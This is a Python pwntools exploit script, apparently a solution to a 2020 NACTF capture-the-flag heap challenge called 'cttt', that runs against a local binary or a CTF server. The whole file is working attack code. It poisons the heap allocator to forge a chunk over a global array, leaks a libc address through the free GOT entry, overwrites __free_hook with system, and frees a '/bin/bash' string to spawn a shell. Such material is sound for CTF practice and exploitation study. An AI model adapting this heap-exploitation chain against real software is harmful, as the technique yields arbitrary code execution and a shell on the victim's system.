pwn/2020-nactf-cttt/exploit.py

from pwn import *
import sys

if len(sys.argv) == 1: # debug mode
    p = process('./ld-linux-x86-64.so.2 --library-path . ./cttt'.split())
else: # remote exploit mode
    p = remote('challenges.ctfd.io', 30252)

elf = ELF('./cttt')
libc = ELF('./libc.so.6')

##### my useful functions
V = lambda x: str(x).encode()
def answer(i):
    i = V(i)
    p.recvuntil(b'>')
    p.sendline(i)
create = lambda: answer(1)
def edit(i, v):
    i = V(i)
    answer(2)
    p.recvuntil(b'Tracker tracker number?\n')
    p.sendline(i)
    p.recvuntil(b'New tracker tracker URL?\n')
    p.sendline(v)
def remove(i):
    i = V(i)
    answer(3)
    p.recvuntil(b'Tracker tracker number?\n')
    p.sendline(i)
listt = lambda: answer(4)
exitt = lambda: answer(5)


##### exploit
### make heap ready
create() #1
create() #2
create() #3
remove(1)
remove(2)
remove(3)

### make forged chunk on urls[15]
edit(3, p64(elf.symbols['urls'] + 15*8)) # use the last url to avoid some SEGSIG
create() #4=3 junk
create() #5=forged chunk. I can control the urls[15] value now using 5th url.

### now we can control urls[15]. so let change it's value to free@GOT to leak libc address.
edit(5, p64(elf.got['free']))
listt() # to print that address

# parse leaked data
p.recvuntil(b'16) ')
leak = p.recvuntil('\n', True)
leak = u64(leak.ljust(8, b'\00'))

# set libc address. now we can access everywhere we want! :D
libc.address = leak - libc.sym['__libc_free']
log.info(f'libc base: {hex(libc.address)}')

### get bash
# hook free function. try to change value of __free_hook variable.
edit(5, p64(libc.sym['__free_hook'])) # remember that 5 address points to the forged chunk
edit(16, p64(libc.sym['system']))

# change value of 4 to "/bin/bash" and call free on it that also calls system function and launches a bash.
edit(4, b"/bin/bash") # it can be 1,2,3 or any other number
remove(4)

# get shell
p.interactive()